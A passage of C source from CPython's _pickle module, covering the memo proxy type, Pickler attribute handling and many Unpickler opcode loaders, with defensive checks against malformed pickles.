Py_INCREF((PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 0, (PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 1, dict_args);
return reduce_value;
}
static PyMethodDef picklerproxy_methods[] = {
_PICKLE_PICKLERMEMOPROXY_CLEAR_METHODDEF
_PICKLE_PICKLERMEMOPROXY_COPY_METHODDEF
_PICKLE_PICKLERMEMOPROXY___REDUCE___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
PicklerMemoProxy_dealloc(PicklerMemoProxyObject *self)
{
PyObject_GC_UnTrack(self);
Py_XDECREF(self->pickler);
PyObject_GC_Del((PyObject *)self);
}
static int
PicklerMemoProxy_traverse(PicklerMemoProxyObject *self,
visitproc visit, void *arg)
{
Py_VISIT(self->pickler);
return 0;
}
static int
PicklerMemoProxy_clear(PicklerMemoProxyObject *self)
{
Py_CLEAR(self->pickler);
return 0;
}
static PyTypeObject PicklerMemoProxyType = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.PicklerMemoProxy", /*tp_name*/
sizeof(PicklerMemoProxyObject), /*tp_basicsize*/
    0,                                          /* tp_itemsize */
(destructor)PicklerMemoProxy_dealloc, /* tp_dealloc */
0, /* tp_print */
0, /* tp_getattr */
0, /* tp_setattr */
0, /* tp_compare */
0, /* tp_repr */
0, /* tp_as_number */
0, /* tp_as_sequence */
0, /* tp_as_mapping */
PyObject_HashNotImplemented, /* tp_hash */
0, /* tp_call */
0, /* tp_str */
PyObject_GenericGetAttr, /* tp_getattro */
PyObject_GenericSetAttr, /* tp_setattro */
0, /* tp_as_buffer */
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
0, /* tp_doc */
(traverseproc)PicklerMemoProxy_traverse, /* tp_traverse */
(inquiry)PicklerMemoProxy_clear, /* tp_clear */
0, /* tp_richcompare */
0, /* tp_weaklistoffset */
0, /* tp_iter */
0, /* tp_iternext */
picklerproxy_methods, /* tp_methods */
};
static PyObject *
PicklerMemoProxy_New(PicklerObject *pickler)
{
PicklerMemoProxyObject *self;
self = PyObject_GC_New(PicklerMemoProxyObject, &PicklerMemoProxyType);
if (self == NULL)
return NULL;
Py_INCREF(pickler);
self->pickler = pickler;
PyObject_GC_Track(self);
return (PyObject *)self;
}
/*****************************************************************************/
static PyObject *
Pickler_get_memo(PicklerObject *self)
{
return PicklerMemoProxy_New(self);
}
static int
Pickler_set_memo(PicklerObject *self, PyObject *obj)
{
PyMemoTable *new_memo = NULL;
if (obj == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (Py_TYPE(obj) == &PicklerMemoProxyType) {
PicklerObject *pickler =
((PicklerMemoProxyObject *)obj)->pickler;
new_memo = PyMemoTable_Copy(pickler->memo);
if (new_memo == NULL)
return -1;
}
else if (PyDict_Check(obj)) {
Py_ssize_t i = 0;
PyObject *key, *value;
new_memo = PyMemoTable_New();
if (new_memo == NULL)
return -1;
while (PyDict_Next(obj, &i, &key, &value)) {
Py_ssize_t memo_id;
PyObject *memo_obj;
if (!PyTuple_Check(value) || PyTuple_GET_SIZE(value) != 2) {
PyErr_SetString(PyExc_TypeError,
"'memo' values must be 2-item tuples");
goto error;
}
memo_id = PyLong_AsSsize_t(PyTuple_GET_ITEM(value, 0));
if (memo_id == -1 && PyErr_Occurred())
goto error;
memo_obj = PyTuple_GET_ITEM(value, 1);
if (PyMemoTable_Set(new_memo, memo_obj, memo_id) < 0)
goto error;
}
}
else {
PyErr_Format(PyExc_TypeError,
"'memo' attribute must be a PicklerMemoProxy object"
"or dict, not %.200s", Py_TYPE(obj)->tp_name);
return -1;
}
PyMemoTable_Del(self->memo);
self->memo = new_memo;
return 0;
error:
if (new_memo)
PyMemoTable_Del(new_memo);
return -1;
}
static PyObject *
Pickler_get_persid(PicklerObject *self)
{
if (self->pers_func == NULL) {
PyErr_SetString(PyExc_AttributeError, "persistent_id");
return NULL;
}
return reconstruct_method(self->pers_func, self->pers_func_self);
}
static int
Pickler_set_persid(PicklerObject *self, PyObject *value)
{
if (value == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (!PyCallable_Check(value)) {
PyErr_SetString(PyExc_TypeError,
"persistent_id must be a callable taking one argument");
return -1;
}
self->pers_func_self = NULL;
Py_INCREF(value);
Py_XSETREF(self->pers_func, value);
return 0;
}
static PyMemberDef Pickler_members[] = {
{"bin", T_INT, offsetof(PicklerObject, bin)},
{"fast", T_INT, offsetof(PicklerObject, fast)},
{"dispatch_table", T_OBJECT_EX, offsetof(PicklerObject, dispatch_table)},
{NULL}
};
static PyGetSetDef Pickler_getsets[] = {
{"memo", (getter)Pickler_get_memo,
(setter)Pickler_set_memo},
{"persistent_id", (getter)Pickler_get_persid,
(setter)Pickler_set_persid},
{NULL}
};
static PyTypeObject Pickler_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.Pickler" , /*tp_name*/
sizeof(PicklerObject), /*tp_basicsize*/
0, /*tp_itemsize*/
(destructor)Pickler_dealloc, /*tp_dealloc*/
0, /*tp_print*/
0, /*tp_getattr*/
0, /*tp_setattr*/
0, /*tp_reserved*/
0, /*tp_repr*/
0, /*tp_as_number*/
0, /*tp_as_sequence*/
0, /*tp_as_mapping*/
0, /*tp_hash*/
0, /*tp_call*/
0, /*tp_str*/
0, /*tp_getattro*/
0, /*tp_setattro*/
0, /*tp_as_buffer*/
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
_pickle_Pickler___init____doc__, /*tp_doc*/
(traverseproc)Pickler_traverse, /*tp_traverse*/
(inquiry)Pickler_clear, /*tp_clear*/
0, /*tp_richcompare*/
0, /*tp_weaklistoffset*/
0, /*tp_iter*/
0, /*tp_iternext*/
Pickler_methods, /*tp_methods*/
Pickler_members, /*tp_members*/
Pickler_getsets, /*tp_getset*/
0, /*tp_base*/
0, /*tp_dict*/
0, /*tp_descr_get*/
0, /*tp_descr_set*/
0, /*tp_dictoffset*/
_pickle_Pickler___init__, /*tp_init*/
PyType_GenericAlloc, /*tp_alloc*/
PyType_GenericNew, /*tp_new*/
PyObject_GC_Del, /*tp_free*/
0, /*tp_is_gc*/
};
/* Temporary helper for calling self.find_class().
   XXX: It would be nice to be able to avoid Python function call overhead by
   directly using the C version of find_class() when find_class() is not
   overridden by a subclass. However, this could become rather hackish. A
simpler optimization would be to call the C function when self is not a
subclass instance. */
static PyObject *
find_class(UnpicklerObject *self, PyObject *module_name, PyObject *global_name)
{
_Py_IDENTIFIER(find_class);
return _PyObject_CallMethodIdObjArgs((PyObject *)self, &PyId_find_class,
module_name, global_name, NULL);
}
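/* Pop the most recent MARK position. self->marks[] records the object-stack
 * sizes at which MARK opcodes were seen; popping one also lowers the stack's
 * fence so later opcodes cannot reach items below the previous (still open)
 * mark, which guards against stack underflow on malformed or hostile
 * pickles. */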
static Py_ssize_t
marker(UnpicklerObject *self)
{
Py_ssize_t mark;
if (self->num_marks < 1) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "could not find MARK");
return -1;
}
mark = self->marks[--self->num_marks];
self->stack->mark_set = self->num_marks != 0;
self->stack->fence = self->num_marks ?
self->marks[self->num_marks - 1] : 0;
return mark;
}
static int
load_none(UnpicklerObject *self)
{
PDATA_APPEND(self->stack, Py_None, -1);
return 0;
}
static int
load_int(UnpicklerObject *self)
{
PyObject *value;
char *endptr, *s;
Py_ssize_t len;
long x;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
errno = 0;
/* XXX: Should the base argument of strtol() be explicitly set to 10?
       XXX(avassalotti): Should this use PyOS_strtol()? */
x = strtol(s, &endptr, 0);
if (errno || (*endptr != '\n' && *endptr != '\0')) {
/* Hm, maybe we've got something long. Let's try reading
* it as a Python int object. */
errno = 0;
/* XXX: Same thing about the base here. */
value = PyLong_FromString(s, NULL, 0);
if (value == NULL) {
PyErr_SetString(PyExc_ValueError,
"could not convert string to int");
return -1;
}
}
else {
if (len == 3 && (x == 0 || x == 1)) {
if ((value = PyBool_FromLong(x)) == NULL)
return -1;
}
else {
if ((value = PyLong_FromLong(x)) == NULL)
return -1;
}
}
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_bool(UnpicklerObject *self, PyObject *boolean)
{
assert(boolean == Py_True || boolean == Py_False);
PDATA_APPEND(self->stack, boolean, -1);
return 0;
}
/* s contains nbytes bytes of an unsigned little-endian integer. Return its value
* as a C Py_ssize_t, or -1 if it's higher than PY_SSIZE_T_MAX.
*/
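/* For example, nbytes == 2 with bytes {0x34, 0x12} yields 0x1234 (4660).
 * When nbytes is 8 on a 32-bit build, any non-zero byte beyond
 * sizeof(size_t) makes the value unrepresentable and the function
 * returns -1. */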
static Py_ssize_t
calc_binsize(char *bytes, int nbytes)
{
unsigned char *s = (unsigned char *)bytes;
int i;
size_t x = 0;
if (nbytes > (int)sizeof(size_t)) {
/* Check for integer overflow. BINBYTES8 and BINUNICODE8 opcodes
* have 64-bit size that can't be represented on 32-bit platform.
*/
for (i = (int)sizeof(size_t); i < nbytes; i++) {
if (s[i])
return -1;
}
nbytes = (int)sizeof(size_t);
}
for (i = 0; i < nbytes; i++) {
x |= (size_t) s[i] << (8 * i);
}
if (x > PY_SSIZE_T_MAX)
return -1;
else
return (Py_ssize_t) x;
}
/* s contains nbytes bytes of a little-endian integer. Return its value as a
 * C long. Obscure: when nbytes is 1 or 2, this is an unsigned little-endian
 * int, but when nbytes is 4 it's a signed one. This is a historical source
 * of cross-platform bugs.
*/
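/* For example, with nbytes == 4 and bytes {0xff, 0xff, 0xff, 0xff} the loop
 * accumulates x == 0xffffffff; on platforms where long is wider than 4 bytes
 * the sign-extension step below turns this into -1, matching the signed
 * BININT encoding. */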
static long
calc_binint(char *bytes, int nbytes)
{
unsigned char *s = (unsigned char *)bytes;
Py_ssize_t i;
long x = 0;
for (i = 0; i < nbytes; i++) {
x |= (long)s[i] << (8 * i);
}
/* Unlike BININT1 and BININT2, BININT (more accurately BININT4)
* is signed, so on a box with longs bigger than 4 bytes we need
* to extend a BININT's sign bit to the full width.
*/
if (SIZEOF_LONG > 4 && nbytes == 4) {
x |= -(x & (1L << 31));
}
return x;
}
static int
load_binintx(UnpicklerObject *self, char *s, int size)
{
PyObject *value;
long x;
x = calc_binint(s, size);
if ((value = PyLong_FromLong(x)) == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_binint(UnpicklerObject *self)
{
char *s;
if (_Unpickler_Read(self, &s, 4) < 0)
return -1;
return load_binintx(self, s, 4);
}
static int
load_binint1(UnpicklerObject *self)
{
char *s;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
return load_binintx(self, s, 1);
}
static int
load_binint2(UnpicklerObject *self)
{
char *s;
if (_Unpickler_Read(self, &s, 2) < 0)
return -1;
return load_binintx(self, s, 2);
}
static int
load_long(UnpicklerObject *self)
{
PyObject *value;
char *s = NULL;
Py_ssize_t len;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
/* s[len-2] will usually be 'L' (and s[len-1] is '\n'); we need to remove
the 'L' before calling PyLong_FromString. In order to maintain
compatibility with Python 3.0.0, we don't actually *require*
the 'L' to be present. */
if (s[len-2] == 'L')
s[len-2] = '\0';
    /* XXX: Should the base argument be explicitly set to 10? */
value = PyLong_FromString(s, NULL, 0);
if (value == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
/* 'size' bytes contain the # of bytes of little-endian 256's-complement
* data following.
*/
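/* For example, a LONG1 opcode followed by a count byte of 0x02 and payload
 * bytes {0xff, 0x00} decodes the payload as little-endian signed data,
 * i.e. the Python int 255; a count of 0x01 with payload {0xff} gives -1.
 * A zero count encodes the int 0 with no payload bytes. */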
static int
load_counted_long(UnpicklerObject *self, int size)
{
PyObject *value;
char *nbytes;
char *pdata;
assert(size == 1 || size == 4);
if (_Unpickler_Read(self, &nbytes, size) < 0)
return -1;
size = calc_binint(nbytes, size);
if (size < 0) {
PickleState *st = _Pickle_GetGlobalState();
/* Corrupt or hostile pickle -- we never write one like this */
PyErr_SetString(st->UnpicklingError,
"LONG pickle has negative byte count");
return -1;
}
if (size == 0)
value = PyLong_FromLong(0L);
else {
/* Read the raw little-endian bytes and convert. */
if (_Unpickler_Read(self, &pdata, size) < 0)
return -1;
value = _PyLong_FromByteArray((unsigned char *)pdata, (size_t)size,
1 /* little endian */ , 1 /* signed */ );
}
if (value == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_float(UnpicklerObject *self)
{
PyObject *value;
char *endptr, *s;
Py_ssize_t len;
double d;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
errno = 0;
d = PyOS_string_to_double(s, &endptr, PyExc_OverflowError);
if (d == -1.0 && PyErr_Occurred())
return -1;
if ((endptr[0] != '\n') && (endptr[0] != '\0')) {
PyErr_SetString(PyExc_ValueError, "could not convert string to float");
return -1;
}
value = PyFloat_FromDouble(d);
if (value == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_binfloat(UnpicklerObject *self)
{
PyObject *value;
double x;
char *s;
if (_Unpickler_Read(self, &s, 8) < 0)
return -1;
x = _PyFloat_Unpack8((unsigned char *)s, 0);
if (x == -1.0 && PyErr_Occurred())
return -1;
if ((value = PyFloat_FromDouble(x)) == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_string(UnpicklerObject *self)
{
PyObject *bytes;
PyObject *obj;
Py_ssize_t len;
char *s, *p;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
/* Strip the newline */
len--;
/* Strip outermost quotes */
if (len >= 2 && s[0] == s[len - 1] && (s[0] == '\'' || s[0] == '"')) {
p = s + 1;
len -= 2;
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"the STRING opcode argument must be quoted");
return -1;
}
assert(len >= 0);
/* Use the PyBytes API to decode the string, since that is what is used
to encode, and then coerce the result to Unicode. */
bytes = PyBytes_DecodeEscape(p, len, NULL, 0, NULL);
if (bytes == NULL)
return -1;
/* Leave the Python 2.x strings as bytes if the *encoding* given to the
Unpickler was 'bytes'. Otherwise, convert them to unicode. */
if (strcmp(self->encoding, "bytes") == 0) {
obj = bytes;
}
else {
obj = PyUnicode_FromEncodedObject(bytes, self->encoding, self->errors);
Py_DECREF(bytes);
if (obj == NULL) {
return -1;
}
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_counted_binstring(UnpicklerObject *self, int nbytes)
{
PyObject *obj;
Py_ssize_t size;
char *s;
if (_Unpickler_Read(self, &s, nbytes) < 0)
return -1;
size = calc_binsize(s, nbytes);
if (size < 0) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_Format(st->UnpicklingError,
"BINSTRING exceeds system's maximum size of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, size) < 0)
return -1;
/* Convert Python 2.x strings to bytes if the *encoding* given to the
Unpickler was 'bytes'. Otherwise, convert them to unicode. */
if (strcmp(self->encoding, "bytes") == 0) {
obj = PyBytes_FromStringAndSize(s, size);
}
else {
obj = PyUnicode_Decode(s, size, self->encoding, self->errors);
}
if (obj == NULL) {
return -1;
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_counted_binbytes(UnpicklerObject *self, int nbytes)
{
PyObject *bytes;
Py_ssize_t size;
char *s;
if (_Unpickler_Read(self, &s, nbytes) < 0)
return -1;
size = calc_binsize(s, nbytes);
if (size < 0) {
PyErr_Format(PyExc_OverflowError,
"BINBYTES exceeds system's maximum size of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, size) < 0)
return -1;
bytes = PyBytes_FromStringAndSize(s, size);
if (bytes == NULL)
return -1;
PDATA_PUSH(self->stack, bytes, -1);
return 0;
}
static int
load_unicode(UnpicklerObject *self)
{
PyObject *str;
Py_ssize_t len;
char *s = NULL;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 1)
return bad_readline();
str = PyUnicode_DecodeRawUnicodeEscape(s, len - 1, NULL);
if (str == NULL)
return -1;
PDATA_PUSH(self->stack, str, -1);
return 0;
}
static int
load_counted_binunicode(UnpicklerObject *self, int nbytes)
{
PyObject *str;
Py_ssize_t size;
char *s;
if (_Unpickler_Read(self, &s, nbytes) < 0)
return -1;
size = calc_binsize(s, nbytes);
if (size < 0) {
PyErr_Format(PyExc_OverflowError,
"BINUNICODE exceeds system's maximum size of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, size) < 0)
return -1;
str = PyUnicode_DecodeUTF8(s, size, "surrogatepass");
if (str == NULL)
return -1;
PDATA_PUSH(self->stack, str, -1);
return 0;
}
static int
load_counted_tuple(UnpicklerObject *self, Py_ssize_t len)
{
PyObject *tuple;
if (Py_SIZE(self->stack) < len)
return Pdata_stack_underflow(self->stack);
tuple = Pdata_poptuple(self->stack, Py_SIZE(self->stack) - len);
if (tuple == NULL)
return -1;
PDATA_PUSH(self->stack, tuple, -1);
return 0;
}
static int
load_tuple(UnpicklerObject *self)
{
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
return load_counted_tuple(self, Py_SIZE(self->stack) - i);
}
static int
load_empty_list(UnpicklerObject *self)
{
PyObject *list;
if ((list = PyList_New(0)) == NULL)
return -1;
PDATA_PUSH(self->stack, list, -1);
return 0;
}
static int
load_empty_dict(UnpicklerObject *self)
{
PyObject *dict;
if ((dict = PyDict_New()) == NULL)
return -1;
PDATA_PUSH(self->stack, dict, -1);
return 0;
}
static int
load_empty_set(UnpicklerObject *self)
{
PyObject *set;
if ((set = PySet_New(NULL)) == NULL)
return -1;
PDATA_PUSH(self->stack, set, -1);
return 0;
}
static int
load_list(UnpicklerObject *self)
{
PyObject *list;
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
list = Pdata_poplist(self->stack, i);
if (list == NULL)
return -1;
PDATA_PUSH(self->stack, list, -1);
return 0;
}
static int
load_dict(UnpicklerObject *self)
{
PyObject *dict, *key, *value;
Py_ssize_t i, j, k;
if ((i = marker(self)) < 0)
return -1;
j = Py_SIZE(self->stack);
if ((dict = PyDict_New()) == NULL)
return -1;
if ((j - i) % 2 != 0) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "odd number of items for DICT");
Py_DECREF(dict);
return -1;
}
for (k = i + 1; k < j; k += 2) {
key = self->stack->data[k - 1];
value = self->stack->data[k];
if (PyDict_SetItem(dict, key, value) < 0) {
Py_DECREF(dict);
return -1;
}
}
Pdata_clear(self->stack, i);
PDATA_PUSH(self->stack, dict, -1);
return 0;
}
static int
load_frozenset(UnpicklerObject *self)
{
PyObject *items;
PyObject *frozenset;
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
items = Pdata_poptuple(self->stack, i);
if (items == NULL)
return -1;
frozenset = PyFrozenSet_New(items);
Py_DECREF(items);
if (frozenset == NULL)
return -1;
PDATA_PUSH(self->stack, frozenset, -1);
return 0;
}
static PyObject *
instantiate(PyObject *cls, PyObject *args)
{
/* Caller must assure args are a tuple. Normally, args come from
Pdata_poptuple which packs objects from the top of the stack
into a newly created tuple. */
assert(PyTuple_Check(args));
if (!PyTuple_GET_SIZE(args) && PyType_Check(cls)) {
_Py_IDENTIFIER(__getinitargs__);
_Py_IDENTIFIER(__new__);
PyObject *func;
if (_PyObject_LookupAttrId(cls, &PyId___getinitargs__, &func) < 0) {
return NULL;
}
if (func == NULL) {
return _PyObject_CallMethodIdObjArgs(cls, &PyId___new__, cls, NULL);
}
Py_DECREF(func);
}
return PyObject_CallObject(cls, args);
}
static int
load_obj(UnpicklerObject *self)
{
PyObject *cls, *args, *obj = NULL;
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
if (Py_SIZE(self->stack) - i < 1)
return Pdata_stack_underflow(self->stack);
args = Pdata_poptuple(self->stack, i + 1);
if (args == NULL)
return -1;
PDATA_POP(self->stack, cls);
if (cls) {
obj = instantiate(cls, args);
Py_DECREF(cls);
}
Py_DECREF(args);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_inst(UnpicklerObject *self)
{
PyObject *cls = NULL;
PyObject *args = NULL;
PyObject *obj = NULL;
PyObject *module_name;
PyObject *class_name;
Py_ssize_t len;
Py_ssize_t i;
char *s;
if ((i = marker(self)) < 0)
return -1;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
/* Here it is safe to use PyUnicode_DecodeASCII(), even though non-ASCII
identifiers are permitted in Python 3.0, since the INST opcode is only
supported by older protocols on Python 2.x. */
module_name = PyUnicode_DecodeASCII(s, len - 1, "strict");
if (module_name == NULL)
return -1;
if ((len = _Unpickler_Readline(self, &s)) >= 0) {
if (len < 2) {
Py_DECREF(module_name);
return bad_readline();
}
class_name = PyUnicode_DecodeASCII(s, len - 1, "strict");
if (class_name != NULL) {
cls = find_class(self, module_name, class_name);
Py_DECREF(class_name);
}
}
Py_DECREF(module_name);
if (cls == NULL)
return -1;
if ((args = Pdata_poptuple(self->stack, i)) != NULL) {
obj = instantiate(cls, args);
Py_DECREF(args);
}
Py_DECREF(cls);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_newobj(UnpicklerObject *self)
{
PyObject *args = NULL;
PyObject *clsraw = NULL;
PyTypeObject *cls; /* clsraw cast to its true type */
PyObject *obj;
PickleState *st = _Pickle_GetGlobalState();
/* Stack is ... cls argtuple, and we want to call
* cls.__new__(cls, *argtuple).
*/
PDATA_POP(self->stack, args);
if (args == NULL)
goto error;
if (!PyTuple_Check(args)) {
PyErr_SetString(st->UnpicklingError,
"NEWOBJ expected an arg " "tuple.");
goto error;
}
PDATA_POP(self->stack, clsraw);
cls = (PyTypeObject *)clsraw;
if (cls == NULL)
goto error;
if (!PyType_Check(cls)) {
PyErr_SetString(st->UnpicklingError, "NEWOBJ class argument "
"isn't a type object");
goto error;
}
if (cls->tp_new == NULL) {
PyErr_SetString(st->UnpicklingError, "NEWOBJ class argument "
"has NULL tp_new");
goto error;
}
/* Call __new__. */
obj = cls->tp_new(cls, args, NULL);
if (obj == NULL)
goto error;
Py_DECREF(args);
Py_DECREF(clsraw);
PDATA_PUSH(self->stack, obj, -1);
return 0;
error:
Py_XDECREF(args);
Py_XDECREF(clsraw);
return -1;
}
static int
load_newobj_ex(UnpicklerObject *self)
{
PyObject *cls, *args, *kwargs;
PyObject *obj;
PickleState *st = _Pickle_GetGlobalState();
PDATA_POP(self->stack, kwargs);
if (kwargs == NULL) {
return -1;
}
PDATA_POP(self->stack, args);
if (args == NULL) {
Py_DECREF(kwargs);
return -1;
}
PDATA_POP(self->stack, cls);
if (cls == NULL) {
Py_DECREF(kwargs);
Py_DECREF(args);
return -1;
}
if (!PyType_Check(cls)) {
Py_DECREF(kwargs);
Py_DECREF(args);
PyErr_Format(st->UnpicklingError,
"NEWOBJ_EX class argument must be a type, not %.200s",
Py_TYPE(cls)->tp_name);
Py_DECREF(cls);
return -1;
}
if (((PyTypeObject *)cls)->tp_new == NULL) {
Py_DECREF(kwargs);
Py_DECREF(args);
Py_DECREF(cls);
PyErr_SetString(st->UnpicklingError,
"NEWOBJ_EX class argument doesn't have __new__");
return -1;
}
obj = ((PyTypeObject *)cls)->tp_new((PyTypeObject *)cls, args, kwargs);
Py_DECREF(kwargs);
Py_DECREF(args);
Py_DECREF(cls);
if (obj == NULL) {
return -1;
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_global(UnpicklerObject *self)
{
PyObject *global = NULL;
PyObject *module_name;
PyObject *global_name;
Py_ssize_t len;
char *s;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
module_name = PyUnicode_DecodeUTF8(s, len - 1, "strict");
if (!module_name)
return -1;
if ((len = _Unpickler_Readline(self, &s)) >= 0) {
if (len < 2) {
Py_DECREF(module_name);
return bad_readline();
}
global_name = PyUnicode_DecodeUTF8(s, len - 1, "strict");
if (global_name) {
global = find_class(self, module_name, global_name);
Py_DECREF(global_name);
}
}
Py_DECREF(module_name);
if (global == NULL)
return -1;
PDATA_PUSH(self->stack, global, -1);
return 0;
}
static int
load_stack_global(UnpicklerObject *self)
{
PyObject *global;
PyObject *module_name;
PyObject *global_name;
PDATA_POP(self->stack, global_name);
PDATA_POP(self->stack, module_name);
if (module_name == NULL || !PyUnicode_CheckExact(module_name) ||
global_name == NULL || !PyUnicode_CheckExact(global_name)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "STACK_GLOBAL requires str");
Py_XDECREF(global_name);
Py_XDECREF(module_name);
return -1;
}
global = find_class(self, module_name, global_name);
Py_DECREF(global_name);
Py_DECREF(module_name);
if (global == NULL)
return -1;
PDATA_PUSH(self->stack, global, -1);
return 0;
}
static int
load_persid(UnpicklerObject *self)
{
PyObject *pid, *obj;
Py_ssize_t len;
char *s;
if (self->pers_func) {
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 1)
return bad_readline();
pid = PyUnicode_DecodeASCII(s, len - 1, "strict");
if (pid == NULL) {
if (PyErr_ExceptionMatches(PyExc_UnicodeDecodeError)) {
PyErr_SetString(_Pickle_GetGlobalState()->UnpicklingError,
"persistent IDs in protocol 0 must be "
"ASCII strings");
}
return -1;
}
obj = call_method(self->pers_func, self->pers_func_self, pid);
Py_DECREF(pid);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"A load persistent id instruction was encountered,\n"
"but no persistent_load function was specified.");
return -1;
}
}
static int
load_binpersid(UnpicklerObject *self)
{
PyObject *pid, *obj;
if (self->pers_func) {
PDATA_POP(self->stack, pid);
if (pid == NULL)
return -1;
obj = call_method(self->pers_func, self->pers_func_self, pid);
Py_DECREF(pid);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"A load persistent id instruction was encountered,\n"
"but no persistent_load function was specified.");
return -1;
}
}
static int
load_pop(UnpicklerObject *self)
{
Py_ssize_t len = Py_SIZE(self->stack);
/* Note that we split the (pickle.py) stack into two stacks,
* an object stack and a mark stack. We have to be clever and
* pop the right one. We do this by looking at the top of the
* mark stack first, and only signalling a stack underflow if
* the object stack is empty and the mark stack doesn't match
* our expectations.
*/
if (self->num_marks > 0 && self->marks[self->num_marks - 1] == len) {
self->num_marks--;
self->stack->mark_set = self->num_marks != 0;
self->stack->fence = self->num_marks ?
self->marks[self->num_marks - 1] : 0;
} else if (len <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
else {
len--;
Py_DECREF(self->stack->data[len]);
Py_SIZE(self->stack) = len;
}
return 0;
}
static int
load_pop_mark(UnpicklerObject *self)
{
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
Pdata_clear(self->stack, i);
return 0;
}
static int
load_dup(UnpicklerObject *self)
{
PyObject *last;
Py_ssize_t len = Py_SIZE(self->stack);
if (len <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
last = self->stack->data[len - 1];
PDATA_APPEND(self->stack, last, -1);
return 0;
}
static int
load_get(UnpicklerObject *self)
{
PyObject *key, *value;
Py_ssize_t idx;
Py_ssize_t len;
char *s;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
key = PyLong_FromString(s, NULL, 10);
if (key == NULL)
return -1;
idx = PyLong_AsSsize_t(key);
if (idx == -1 && PyErr_Occurred()) {
Py_DECREF(key);
return -1;
}
value = _Unpickler_MemoGet(self, idx);
if (value == NULL) {
if (!PyErr_Occurred())
PyErr_SetObject(PyExc_KeyError, key);
Py_DECREF(key);
return -1;
}
Py_DECREF(key);
PDATA_APPEND(self->stack, value, -1);
return 0;
}
static int
load_binget(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
idx = Py_CHARMASK(s[0]);
value = _Unpickler_MemoGet(self, idx);
if (value == NULL) {
PyObject *key = PyLong_FromSsize_t(idx);
if (key != NULL) {
PyErr_SetObject(PyExc_KeyError, key);
Py_DECREF(key);
}
return -1;
}
PDATA_APPEND(self->stack, value, -1);
return 0;
}
static int
load_long_binget(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 4) < 0)
return -1;
idx = calc_binsize(s, 4);
value = _Unpickler_MemoGet(self, idx);
if (value == NULL) {
PyObject *key = PyLong_FromSsize_t(idx);
if (key != NULL) {
PyErr_SetObject(PyExc_KeyError, key);
Py_DECREF(key);
}
return -1;
}
PDATA_APPEND(self->stack, value, -1);
return 0;
}
/* Push an object from the extension registry (EXT[124]). nbytes is
* the number of bytes following the opcode, holding the index (code) value.
*/
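/* Lookup order: first the module's extension_cache; on a miss, the
 * inverted_registry maps the code to a (module_name, class_name) pair which
 * is resolved through find_class() and then cached for subsequent EXT
 * opcodes. A code <= 0 is rejected as corrupt. */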
static int
load_extension(UnpicklerObject *self, int nbytes)
{
char *codebytes; /* the nbytes bytes after the opcode */
long code; /* calc_binint returns long */
PyObject *py_code; /* code as a Python int */
